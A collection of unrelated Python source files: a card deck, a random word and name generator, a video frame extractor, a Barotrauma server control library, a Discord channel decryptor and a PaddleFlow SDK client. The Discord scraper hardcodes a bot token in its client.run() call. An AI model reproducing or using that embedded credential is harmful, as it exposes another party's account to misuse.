#### File: pyanitsa-simulation/src/deck.py ```python from random import shuffle as rand_shuffle from card import Card class Deck: def __init__(self) -> None: self.cards = [] self._build() self._shuffle() def __len__(self) -> int: return len(self.cards) def show(self) -> None: print(self.cards) def draw_card(self) -> Card: return self.cards.pop() def _build(self) -> None: suits = ('\u2660', '\u2666', '\u2663', '\u2665') # ≡ ('♠', '♦', '♣', '♥') self.cards = [Card(value, suit, None) for value in range(2, 15) for suit in suits] def _shuffle(self) -> None: rand_shuffle(self.cards) ```
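A short sketch of the Deck in use; the three-argument Card constructor `(value, suit, owner)` is taken from `_build()` above, and the Card class itself lives in card.py, which is not shown here.

```python
# Draw a few cards from a freshly shuffled deck.
deck = Deck()
print(len(deck))         # 52
hand = [deck.draw_card() for _ in range(5)]
print(hand, len(deck))   # 5 random cards, 47 left in the deck
```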
{ "source": "8nhuman8/rand-word", "score": 4 }
#### File: rand-word/randword/rand_name.py ```python from random import choice, sample from .utilities import get_data def name(count: int | None = None, gender: str | None = None) -> str | list[str]: ''' Returns a random first name or a list of them Args: count (int, optional): The number of names to be generated. Defaults to `None` gender (str, optional): Specifies the name of which gender will be generated. Defaults to `None` Returns: str | list[str]: A random first name if `count` is `None` or a list of random first names if `count` is not `None` ''' if gender == 'm': names = get_data('names', 'male_names') elif gender == 'f': names = get_data('names', 'female_names') else: male_names = get_data('names', 'male_names') female_names = get_data('names', 'female_names') names = male_names + female_names if count: return sample(names, count) else: return choice(names) def surname(count: int | None = None) -> str | list[str]: ''' Returns a random surname or a list of them Args: count (int, optional): The number of surnames to be generated. Defaults to `None` Returns: str | list[str]: A random surname if `count` is `None` or a list of surnames if `count` is not `None` ''' surnames = get_data('names', 'surnames') if count: return sample(surnames, count) else: return choice(surnames) def fullname(count: int | None = None, gender: int | None = None) -> str | list[str]: ''' Returns a random fullname or a list of them Args: count (int, optional): The number of fullnames to be generated. Defaults to `None` gender (str): Specifies the fullname of which gender will be generated. Defaults to `None` Returns: str | list[str]: A random fullname if `count` is `None` or a list of random fullnames if `count` is not `None` ''' if gender == 'm': names = get_data('names', 'male_names') elif gender == 'f': names = get_data('names', 'female_names') else: male_names = get_data('names', 'male_names') female_names = get_data('names', 'female_names') names = male_names + female_names surnames = get_data('names', 'surnames') if count: fullnames = [] random_names = sample(names, count) random_surnames = sample(surnames, count) for name, surname in zip(random_names, random_surnames): fullnames.append(f'{name} {surname}') return fullnames else: return f'{choice(names)} {choice(surnames)}' if __name__ == '__main__': print(name()) print(surname()) print(fullname()) ``` #### File: rand-word/randword/rand_word.py ```python from random import choice, sample from .utilities import get_data PARTS_OF_SPEECH = ['adj', 'adv', 'conj', 'interj', 'noun', 'prep', 'pron', 'verb'] def word(count: int | None = None, include_pos: list[str] | None = None, exclude_pos: list[str] | None = None, word_len: int | None = None, min_word_len: int = 1, max_word_len: int | None = None, starts_with: str | None = None, ends_with: str | None = None, pattern: str | None = None) -> str | list[str]: ''' Returns a random English word or a list of words Abbreviation "pos" means "part of speech" Args: count (int, optional): The number of words to be generated. Defaults to None. include_pos (list of str, optional): List of parts of speech that will be included in the generation. Defaults to `None` exclude_pos (list of str, optional): List of parts of speech that will be excluded in the generation. Defaults to `None` word_len (int, optional): Specifies the length of a word. Ignores the `min_word_len` and `max_word_len` parameters. Defaults to `None` min_word_len (int, optional): The minimum word length. 
Defaults to `1` max_word_len (int, optional): The maximum word length. Defaults to `None` starts_with (str, optional): The pattern with which the word begins. Defaults to `None` ends_with (str, optional): The pattern with which the word ends. Defaults to `None` pattern (str, optional): The pattern that should be contained in the word. Defaults to `None` Returns: str | list[str]: A random English word if `count` is `None` or a list of them if `count` is not `None` Raises: IndexError: If the word was not found or if the desired number of words was not found ''' if not include_pos: include_pos = PARTS_OF_SPEECH if exclude_pos: parts_of_speech = list(set(include_pos) - set(exclude_pos)) else: parts_of_speech = include_pos words = [] for part_of_speech in parts_of_speech: pos_words = get_data('parts_of_speech', part_of_speech) words.extend(pos_words) if max_word_len: filtered_words = list(filter(lambda word: min_word_len <= len(word) <= max_word_len, words)) else: filtered_words = list(filter(lambda word: min_word_len <= len(word), words)) if word_len: filtered_words = list(filter(lambda word: word_len == len(word), words)) if starts_with: filtered_words = list(filter(lambda word: word.startswith(starts_with), filtered_words)) if ends_with: filtered_words = list(filter(lambda word: word.endswith(ends_with), filtered_words)) if pattern: filtered_words = list(filter(lambda word: pattern in word, filtered_words)) if count: INDEX_ERROR_DESCRIPTION = 'The desired number of words was not found' if not filtered_words: raise IndexError(INDEX_ERROR_DESCRIPTION) try: final_words = sample(filtered_words, count) except ValueError: raise IndexError(INDEX_ERROR_DESCRIPTION) return final_words else: if not filtered_words: raise IndexError('The word was not found') return choice(filtered_words) if __name__ == '__main__': print(word()) ```
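Putting the filters together; every keyword below maps to a parameter documented in the `word()` docstring above.

```python
# Example calls against the word() API defined above.
print(word())                                    # one random word
print(word(count=3, include_pos=['noun']))       # three random nouns
print(word(starts_with='pre', max_word_len=8))   # e.g. a short word like 'prefix'
print(word(word_len=5, pattern='ou'))            # a 5-letter word containing 'ou'
```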
{ "source": "8nhuman8/space-time-replacement", "score": 3 }
#### File: 8nhuman8/space-time-replacement/main.py ```python import cv2 def extract_images(path_in: str, path_out: str = 'frames'): vidcap = cv2.VideoCapture(path_in) if not vidcap.isOpened(): print('Error opening video') count = 0 while vidcap.isOpened(): status, image = vidcap.read() if not status: print('Video file finished. Total Frames:', int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))) break cv2.imwrite(rf'{path_out}\frame{count}.jpg', image) count += 1 if __name__== '__main__': extract_images('videos/sample.mp4') ```
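The inverse operation, stitching the extracted frames back into a clip, is the natural companion to `extract_images()`. A hedged sketch using OpenCV's VideoWriter; the fps value and the mp4v codec are assumptions, not taken from the repository.

```python
import glob
import cv2

def assemble_video(frames_dir: str, path_out: str, fps: float = 30.0):
    # Sort numerically so frame10 comes after frame9, not after frame1.
    frames = sorted(glob.glob(f'{frames_dir}/frame*.jpg'),
                    key=lambda p: int(''.join(filter(str.isdigit, p.split('frame')[-1]))))
    first = cv2.imread(frames[0])
    height, width = first.shape[:2]
    fourcc = cv2.VideoWriter_fourcc(*'mp4v')  # assumed codec
    writer = cv2.VideoWriter(path_out, fourcc, fps, (width, height))
    for frame_path in frames:
        writer.write(cv2.imread(frame_path))
    writer.release()
```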
{ "source": "8o7wer/baropy", "score": 3 }
#### File: baropy/baropy/__init__.py
```python
import time
import socket
import sys
import os
from threading import Thread

class Barotrauma:
    def __init__(self, stdinpath, udspath, writetimeout=0.1, responsetime=0.1, buffersize=128):
        self.stdinpath = stdinpath
        self.udspath = udspath
        self.writetimeout = writetimeout
        self.responsetime = responsetime
        self.udsbuffer = Udsbuffer(size=buffersize)
        self.__start_uds_thread()

    def __uds_thread(self):
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            sock.connect(self.udspath)
        except Exception as error:
            raise Exception("Error connecting to unix domain socket: " + repr(error))
        while True:
            data = ""
            while True:  # Receive exactly one line of data
                data = data + sock.recv(1).decode()
                if data.endswith("\n"):
                    break
            self.udsbuffer.add(data.strip("\n"))

    def __start_uds_thread(self):
        thread = Thread(target=self.__uds_thread)
        thread.start()

    def send_command(self, command, args=[], followup=[]):
        try:
            with open(self.stdinpath, "w") as file:
                file.write(" ".join([command] + args))
                for string in followup:
                    time.sleep(self.writetimeout)
                    file.write(string)
        except Exception as error:
            raise Exception("Error on writing to pipefile: " + repr(error))

    def response(self, command, args=[]):
        self.udsbuffer.flush()
        self.send_command(command, args)
        time.sleep(self.responsetime)
        response = self.udsbuffer.buffer
        index = [i for i, s in enumerate(response) if command in s][0]  # Get index of the command in the game output
        response = response[index+1:]  # Trim the buffer so it only holds the text printed after the command
        return response

    def ban_name(self, name, reason, duration):
        self.send_command("ban", [name], [reason, duration])

    def ban_ip(self, ip, reason, duration):
        self.send_command("banip", [ip], [reason, duration])

    def get_players(self):
        responses = self.response("clientlist")
        responses = [i for i in responses if i.startswith("-")]
        clients = []
        for response in responses:
            response = response[2:]
            if(response.find("playing") == -1):
                name = response[response.find(":")+2:response.rfind(",")]
            else:
                name = response[response.find(":")+2:response.find("playing")-1]
            id = response[:response.find(":")]
            ip = response[response.rfind(",")+2:].strip()
            clients.append(Player(self, name, id, ip))
        return clients

    def get_player_by_name(self, name):  # returns -1 if a client can't be found
        clients = self.get_players()
        for client in clients:
            if client.name.lower() == name.lower():
                return client
        return -1

    def get_player_by_ip(self, ip):  # same as above
        clients = self.get_players()
        for client in clients:
            if client.ip == ip:
                return client
        return -1

    def get_player_by_id(self, id):  # Id must be a string
        clients = self.get_players()
        for client in clients:
            if client.id == id:
                return client
        return -1

class Udsbuffer:  # Holds the buffer for incoming lines of data from the game server
    def __init__(self, size=128):
        self.buffer = []
        self.size = size

    def add(self, data):  # Please use this instead of udsbuffer.buffer.append(data), as it caps the size of the list
        self.buffer.append(data)
        if len(self.buffer) > self.size:
            del self.buffer[:-self.size]  # drop the oldest entries, keep the newest `size` lines

    def flush(self):
        self.buffer.clear()

class Player:
    def __init__(self, barotrauma, name, id, ip):
        self.name = name
        self.id = id
        self.ip = ip
        self.barotrauma = barotrauma

    def ban_name(self, reason, duration):
        self.barotrauma.ban_name(self.name, reason, duration)

    def ban_ip(self, reason, duration):
        self.barotrauma.ban_ip(self.ip, reason, duration)

    def give_rank(self, rank):
        # command name quoted verbatim from the original call; adjust if the
        # server expects a different console command
        self.barotrauma.send_command("give_rank", [self.id], [rank])

    def give_permission(self, permission):
        self.barotrauma.send_command("give_permission", [self.id], [permission])
```
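End-to-end, the class above is driven like this; the pipe and socket paths are whatever the Barotrauma server wrapper exposes (placeholders here), and the ban duration format is an assumption.

```python
# Hedged usage sketch -- paths are placeholders for the server's stdin pipe
# and unix domain socket.
server = Barotrauma('/srv/barotrauma/stdin.pipe', '/srv/barotrauma/output.sock')

for player in server.get_players():
    print(player.id, player.name, player.ip)

cheater = server.get_player_by_name('GrieferGuy')  # hypothetical player
if cheater != -1:
    cheater.ban_name('griefing', '7d')             # duration format assumed
```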
{ "source": "8o-COLLECTIVE/cobalt8", "score": 3 }
#### File: cobalt8/cobalt8/scraper.py
```python
import discord
import hashlib
from .aes import AES

# Create an anonymous discord client, which retrieves the content of the
# selected channel and then dies.
def scrape():
    print("Establishing Discord client, please hold...")
    client = discord.Client()

    @client.event
    async def on_ready():
        channel = get_channel()
        key = input("\nConversation key: ")
        aesobj = AES(bytearray.fromhex(key))
        key_hash = hashlib.md5(bytearray.fromhex(key)).hexdigest()
        print("\nLoading conversation...\n")

        if channel is not None:
            await multi_decrypt(channel, key_hash, aesobj)
        else:
            print("\nFailed to find channel with provided ID")
            toScrape = input("\nDo you want to try again? [Y or N] ")
            if(toScrape.lower() == "y"):
                await on_ready()

        await client.close()

    def get_channel():
        to_scrape = input("\nInput channel ID to be scraped [or press enter for #cobalt]: ")
        if len(to_scrape) == 0:
            to_scrape = 813872961656193045
        try:
            channel = client.get_channel(int(to_scrape))
        except:
            print("\nIt would appear that channel ID is invalid.")
            return None
        return channel

    def decrypt_text(item, aesobj):
        format_message = lambda datetime, author, dmessage: "[{}] {}: {}".format(datetime, author, dmessage)

        text = item.content
        text = text[32:]   # strip the 32-hex-char key hash prefix
        iv = text[:32]     # the next 32 hex chars are the IV
        text = text[32:]   # the rest is the ciphertext

        dmessage = aesobj.decrypt_ctr(bytearray.fromhex(text), bytearray.fromhex(iv)).decode('ascii')
        messagef = format_message(str(item.created_at), item.author.name, dmessage)
        return messagef

    async def multi_decrypt(channel, key_hash, aesobj):
        messages = await channel.history().flatten()
        stack = [decrypt_text(item, aesobj) for item in messages if item.content.startswith(key_hash)]
        for x in range(len(stack)):
            print(stack.pop())

    client.run('ODAxMjE4ODI4MDA0MjI5MTIw.YAdfLg._IxT1qxs3AaFFig-7e6GwC50c9s')
```
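The slicing in `decrypt_text()` implies a fixed wire format: a 32-hex-char MD5 of the key, then a 32-hex-char IV, then the AES-CTR ciphertext as hex. A matching sender side, sketched under that assumption; since CTR encryption and decryption are the same keystream XOR, the `decrypt_ctr` method shown above can serve for both directions.

```python
# Hedged sender-side sketch matching the slicing in decrypt_text():
# md5(key) (32 hex chars) + iv (32 hex chars) + ciphertext (hex).
import os
import hashlib
from .aes import AES

def encrypt_text(key_hex: str, plaintext: str) -> str:
    key = bytearray.fromhex(key_hex)
    iv = os.urandom(16)
    aesobj = AES(key)
    # CTR mode: encrypting is the same operation as decrypting
    ct = aesobj.decrypt_ctr(bytearray(plaintext, 'ascii'), bytearray(iv))
    return hashlib.md5(key).hexdigest() + iv.hex() + bytes(ct).hex()
```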
{ "source": "8olio8/PaddleFlow", "score": 2 }
#### File: client/paddleflow/client.py ```python import json from urllib import parse from paddleflow.common.exception.paddleflow_sdk_exception import PaddleFlowSDKException from paddleflow.common import api from paddleflow.job import JobServiceApi from paddleflow.log import LogServiceApi from paddleflow.user import UserServiceApi from paddleflow.queue import QueueServiceApi from paddleflow.fs import FSServiceApi from paddleflow.run import RunServiceApi from paddleflow.pipeline import PipelineServiceApi from paddleflow.utils import api_client from paddleflow.cluster import ClusterServiceApi from paddleflow.flavour import FlavouriceApi class Client(object): """Client class """ def __init__(self, paddleflow_server, username, password, paddleflow_port=8080): """ :param paddleflow_server: the address of paddleflow server :type paddleflow_server: str :param fs_server: the address of fs server :type fs_server:str """ self.paddleflow_server = None self.token = None self.user_id = username self.header = None self.password = password if paddleflow_server is None or paddleflow_server.strip() == "": raise PaddleFlowSDKException("InvalidServer", "paddleflow server should not be none or empty") self.paddleflow_server = "http://%s:%s" % (paddleflow_server, paddleflow_port) def login(self, user_name, password): """ :param user_name: :type user_name: str :param passWord :type password: str """ if self.paddleflow_server is None: raise PaddleFlowSDKException("InvalidClient", "client should be initialized") if user_name is None or user_name.strip() == "": raise PaddleFlowSDKException("InvalidUser", "user_name should not be none or empty") if password is None or password.strip() == "": raise PaddleFlowSDKException("InvalidPassWord", "password should not be none or empty") body = { "username": user_name, "password": password } response = api_client.call_api(method="POST", url=parse.urljoin(self.paddleflow_server, api.PADDLE_FLOW_LOGIN), json=body) if not response: raise PaddleFlowSDKException("Connection Error", "login failed due to HTTPError") data = json.loads(response.text) if 'message' in data: return False, data['message'] self.user_id = user_name self.password = password self.header = { "x-pf-authorization": data['authorization'] } return True, None def pre_check(self): """ precheck to check header """ if not self.user_id or not self.header: raise PaddleFlowSDKException("InvalidOperator", "should login first") def add_user(self, user_name, password): """ :param user_name: :type user_name: str :param passWord :type password: str :return true, None if success false, message if failed """ self.pre_check() if user_name is None or user_name.strip() == "": raise PaddleFlowSDKException("InvalidUser", "user_name should not be none or empty") if password is None or password.strip() == "": raise PaddleFlowSDKException("InvalidPassWord", "password should not be none or empty") return UserServiceApi.add_user(self.paddleflow_server, user_name, password, self.header) def del_user(self, user_name): """ :param user_name: :type user_name: str :param passWord :type password: str :return :true,None if success :false, message if failed """ self.pre_check() if user_name is None or user_name.strip() == "": raise PaddleFlowSDKException("InvalidUser", "user_name should not be none or empty") return UserServiceApi.del_user(self.paddleflow_server, user_name, self.header) def list_user(self, maxsize=100): """list user info""" self.pre_check() return UserServiceApi.list_user(self.paddleflow_server, self.header, maxsize) def 
update_password(self, name, password): """update name's password""" self.pre_check() if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidUser", "user_name should not be none or empty") if password is None or password.strip() == "": raise PaddleFlowSDKException("InvalidPassWord", "password should not be none or empty") return UserServiceApi.update_password(self.paddleflow_server, name, password, self.header) def add_queue(self, name, namespace, clusterName, maxResources, minResources=None, schedulingPolicy=None, location=None, quotaType=None): """ add queue""" self.pre_check() if namespace is None or namespace.strip() == "": raise PaddleFlowSDKException("InvalidNameSpace", "namesapce should not be none or empty") if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") if clusterName is None or clusterName.strip() == "": raise PaddleFlowSDKException("InvalidQueueClusterName", "clustername should not be none or empty") if maxResources is None or maxResources['cpu'] is None or maxResources['mem'] is None: raise PaddleFlowSDKException("InvalidQueueMaxResources", "queue maxResources cpu or mem should not be none or empty") return QueueServiceApi.add_queue(self.paddleflow_server, name, namespace, clusterName, maxResources, minResources, schedulingPolicy, location, quotaType, self.header) def grant_queue(self, username, queuename): """ grant queue""" self.pre_check() if username is None or username.strip() == "": raise PaddleFlowSDKException("InvalidName", "name should not be none or empty") if queuename is None or queuename.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") return QueueServiceApi.grant_queue(self.paddleflow_server, username, queuename, self.header) def ungrant_queue(self, username, queuename): """ grant queue""" self.pre_check() if username is None or username.strip() == "": raise PaddleFlowSDKException("InvalidName", "name should not be none or empty") if queuename is None or queuename.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") return QueueServiceApi.ungrant_queue(self.paddleflow_server, username, queuename, self.header) def show_queue_grant(self, username=None, maxsize=100): """show queue grant info """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidName", "name should not be none or empty") return QueueServiceApi.show_grant(self.paddleflow_server, username, self.header, maxsize) def del_queue(self, queuename): """ delete queue""" self.pre_check() if queuename is None or queuename.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") return QueueServiceApi.del_queue(self.paddleflow_server, queuename, self.header) def list_queue(self, maxsize=100, marker=None): """ list queue """ self.pre_check() return QueueServiceApi.list_queue(self.paddleflow_server, self.header, maxsize, marker) def show_queue(self, queuename): """ show queue info """ self.pre_check() if queuename is None or queuename.strip() == "": raise PaddleFlowSDKException("InvalidQueueName", "queuename should not be none or empty") return QueueServiceApi.show_queue(self.paddleflow_server, queuename, self.header) def list_flavour(self, maxsize=100, marker=None, clustername="", key=""): """ list flavour """ self.pre_check() return FlavouriceApi.list_flavour(host=self.paddleflow_server, header=self.header, 
maxsize=maxsize, marker=marker, clustername=clustername, key=key) def show_flavour(self, name): """ show flavour """ self.pre_check() if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "name should not be none or empty") return FlavouriceApi.show_flavour(self.paddleflow_server, name, self.header) def add_flavour(self, name, cpu, memory, scalar_resources=None, cluster_name=None): """ add flavour""" self.pre_check() if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "name should not be none or empty") if cpu is None or cpu.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "cpu should not be none or empty") if memory is None or memory.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "memory should not be none or empty") return FlavouriceApi.add_flavour(self.paddleflow_server, name, cpu=cpu, mem=memory, scalar_resources=scalar_resources, cluster_name=cluster_name, header=self.header) def del_flavour(self, flavourname): """ delete flavour""" self.pre_check() if flavourname is None or flavourname.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "flavourname should not be none or empty") return FlavouriceApi.del_flavour(self.paddleflow_server, flavourname, self.header) def update_flavour(self, name, cpu=None, memory=None, scalar_resources=None, cluster_name=None): """ update cluster """ self.pre_check() if name is None or name.strip() == "": raise PaddleFlowSDKException("InvalidFlavourName", "name should not be none or empty") return FlavouriceApi.update_flavour(self.paddleflow_server, name, cpu=cpu, mem=memory, scalar_resources=scalar_resources, cluster_name=cluster_name, header=self.header) def add_fs(self, fsname, url, username=None, properties=None): """ add fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if url is None or url.strip() == "": raise PaddleFlowSDKException("InvalidURL", "url should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.add_fs(self.paddleflow_server, fsname, url, self.user_id, properties, userinfo) def show_fs(self, fsname, username=None): """ show fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.show_fs(self.paddleflow_server, fsname, self.user_id, userinfo) def delete_fs(self, fsname, username=None): """ delete fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.delete_fs(self.paddleflow_server, fsname, self.user_id, userinfo) def list_fs(self, username=None, maxsize=100): """ list fs """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.list_fs(self.paddleflow_server, self.user_id, userinfo, maxsize) def mount(self, fsname, path, mountOptions, 
              username=None):
        """ mount fs """
        self.pre_check()
        if username and username.strip() == "":
            raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty")
        if fsname == "":
            raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty")
        if path == "":
            raise PaddleFlowSDKException("InvalidPath", "path should not be none or empty")
        userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server}
        return FSServiceApi.mount(self.paddleflow_server, fsname, path, self.user_id, self.password,
                                  mountOptions, userinfo)

    def create_cache(self, fsname, options, username=None):
        """ create cache config for fs """
        self.pre_check()
        if username and username.strip() == "":
            raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty")
        if fsname == "":
            raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty")
        userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server}
        return FSServiceApi.create_cache(self.paddleflow_server, fsname, options, userinfo)

    def update_fs_cache(self, fsname, params, username=None):
        """ update cache config for fs """
        self.pre_check()
        if username and username.strip() == "":
            raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty")
        if fsname == "":
            raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty")
        userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server}
        return FSServiceApi.update_cache(self.paddleflow_server, fsname, params, userinfo)

    def get_fs_cache(self, fsname, username=None):
        """ get cache config for fs """
        self.pre_check()
        if username and username.strip() == "":
            raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty")
        if fsname == "":
            raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty")
        userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server}
        return FSServiceApi.get_cache(self.paddleflow_server, fsname, userinfo)

    def delete_fs_cache(self, fsname, username=None):
        """ delete fs cache config """
        self.pre_check()
        if fsname is None or fsname.strip() == "":
            raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty")
        if username and username.strip() == "":
            raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty")
        userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server}
        return FSServiceApi.delete_cache(self.paddleflow_server, fsname, userinfo)

    def add_link(self, fsname, fspath, url, username=None, properties=None):
        """ add link """
        self.pre_check()
        if fsname is None or fsname.strip() == "":
            raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty")
        if url is None or url.strip() == "":
            raise PaddleFlowSDKException("InvalidURL", "url should not be none or empty")
        if fspath is None or fspath.strip() == "":
            raise PaddleFlowSDKException("InvalidFSPath", "fspath should not be none or empty")
        userinfo = {'header': self.header, 'name': username, 'host': self.paddleflow_server}
        return FSServiceApi.add_link(self.paddleflow_server, fsname, fspath, url, self.user_id, properties, userinfo)

    def delete_link(self, fsname, fspath, username=None):
        """ delete link """
        self.pre_check()
        if fsname is None or fsname.strip() == "":
            raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty")
        if username and username.strip() == "":
            raise PaddleFlowSDKException("InvalidUserName",
"username should not be none or empty") if fspath is None or fspath.strip() == "": raise PaddleFlowSDKException("InvalidFSPath", "fspath should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.delete_link(self.paddleflow_server, fsname, fspath, self.user_id, userinfo) def list_link(self, fsname, username=None, maxsize=100): """ list fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.list_link(self.paddleflow_server, fsname, self.user_id, userinfo, maxsize) def show_link(self, fsname, fspath, username=None): """ show fs """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if fspath is None or fspath.strip() == "": raise PaddleFlowSDKException("InvalidFSPath", "fspath should not be none or empty") userinfo={'header': self.header, 'name': username, 'host': self.paddleflow_server} return FSServiceApi.show_link(self.paddleflow_server, fsname, fspath, self.user_id, userinfo) def create_run(self, fsname, username=None, runname=None, desc=None, runyamlpath=None, runyamlraw=None, pipelineid=None, param=None, disabled=None, dockerenv=None): """ create run """ self.pre_check() if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if runname and runname.strip() == "": raise PaddleFlowSDKException("InvalidRunName", "runname should not be none or empty") return RunServiceApi.add_run(self.paddleflow_server, fsname, runname, desc, param, username, runyamlpath, runyamlraw, pipelineid, self.header, disabled, dockerenv) def list_run(self, fsname=None, username=None, runid=None, runname=None, maxsize=100, marker=None): """ list run """ self.pre_check() if fsname and fsname.strip() == "": raise PaddleFlowSDKException("InvalidFSName", "fsname should not be none or empty") if username and username.strip() == "": raise PaddleFlowSDKException("InvalidUserName", "username should not be none or empty") if runid and runid.strip() == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") return RunServiceApi.list_run(self.paddleflow_server, fsname, username, runid, runname, self.header, maxsize, marker) def status_run(self, runid): """ status run """ self.pre_check() if runid is None or runid.strip() == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") return RunServiceApi.status_run(self.paddleflow_server, runid, self.header) def stop_run(self, runid, force=False): """ stop run """ self.pre_check() if runid is None or runid.strip() == "": raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty") if not isinstance(force, bool): raise PaddleFlowSDKException("InvalidParam", "the Parameter [force] should be an instance of bool") return RunServiceApi.stop_run(self.paddleflow_server, runid, self.header, force) def create_cluster(self, clustername, endpoint, clustertype, credential=None, description=None, source=None, setting=None, status=None, namespacelist=None, version=None): """ create cluster """ self.pre_check() if clustername is None or clustername.strip() == 
"": raise PaddleFlowSDKException("InvalidClusterName", "clustername should not be none or empty") if endpoint is None or endpoint.strip() == "": raise PaddleFlowSDKException("InvalidEndpoint", "endpoint should not be none or empty") if clustertype is None or clustertype.strip() == "": raise PaddleFlowSDKException("InvalidClusterType", "clustertype should not be none or empty") return ClusterServiceApi.create_cluster(self.paddleflow_server, clustername, endpoint, clustertype, credential, description, source, setting, status, namespacelist, version, self.header) def list_cluster(self, maxkeys=100, marker=None, clustername=None, clusterstatus=None): """ list cluster """ self.pre_check() return ClusterServiceApi.list_cluster(self.paddleflow_server, maxkeys, marker, clustername, clusterstatus, self.header) def show_cluster(self, clustername): """ status cluster """ self.pre_check() if clustername is None or clustername == "": raise PaddleFlowSDKException("InvalidClusterName", "clustername should not be none or empty") return ClusterServiceApi.show_cluster(self.paddleflow_server, clustername, self.header) def delete_cluster(self, clustername): """ delete cluster """ self.pre_check() if clustername is None or clustername == "": raise PaddleFlowSDKException("InvalidClusterName", "clustername should not be none or empty") return ClusterServiceApi.delete_cluster(self.paddleflow_server, clustername, self.header) def update_cluster(self, clustername, endpoint=None, credential=None, clustertype=None, description=None, source=None, setting=None, status=None, namespacelist=None, version=None): """ update cluster """ self.pre_check() if clustername is None or clustername == "": raise PaddleFlowSDKException("InvalidClusterName", "clustername should not be none or empty") return ClusterServiceApi.update_cluster(self.paddleflow_server, clustername, endpoint, credential, clustertype, description, source, setting, status, namespacelist, version, self.header) def list_cluster_resource(self, clustername=None): """ list cluster resource """ self.pre_check() return ClusterServiceApi.list_cluster_resource(self.paddleflow_server, clustername, self.header) def create_pipeline(self, fsname, yamlpath, name=None, username=None): """ create pipeline """ self.pre_check() if fsname is None or fsname.strip() == "": raise PaddleFlowSDKException("InvalidFsName", "fsname should not be none or empty") if yamlpath is None or yamlpath.strip() == "": raise PaddleFlowSDKException("InvalidYamlPath", "yamlpath should not be none or empty") return PipelineServiceApi.create_pipeline(self.paddleflow_server, fsname, yamlpath, name, username, self.header) def list_pipeline(self, userfilter=None, fsfilter=None, namefilter=None, maxkeys=None, marker=None): """ list pipeline """ self.pre_check() return PipelineServiceApi.list_pipeline(self.paddleflow_server, userfilter, fsfilter, namefilter, maxkeys, marker, self.header) def show_pipeline(self, pipelineid): """ status pipeline """ self.pre_check() if pipelineid is None or pipelineid == "": raise PaddleFlowSDKException("InvalidPipelineID", "pipelineid should not be none or empty") return PipelineServiceApi.show_pipeline(self.paddleflow_server, pipelineid, self.header) def delete_pipeline(self, pipelineid): """ delete pipeline """ self.pre_check() if pipelineid is None or pipelineid == "": raise PaddleFlowSDKException("InvalidPipelineID", "pipelineid should not be none or empty") return PipelineServiceApi.delete_pipeline(self.paddleflow_server, pipelineid, self.header) def retry_run(self, 
                  runid):
        """ retry run """
        self.pre_check()
        if runid is None or runid == "":
            raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty")
        return RunServiceApi.retry_run(self.paddleflow_server, runid, self.header)

    def delete_run(self, runid):
        """ delete run """
        self.pre_check()
        if runid is None or runid == "":
            raise PaddleFlowSDKException("InvalidRunID", "runid should not be none or empty")
        return RunServiceApi.delete_run(self.paddleflow_server, runid, self.header)

    def artifact(self, userfilter=None, fsfilter=None, runfilter=None, typefilter=None, pathfilter=None,
                 maxkeys=None, marker=None):
        """ artifact """
        self.pre_check()
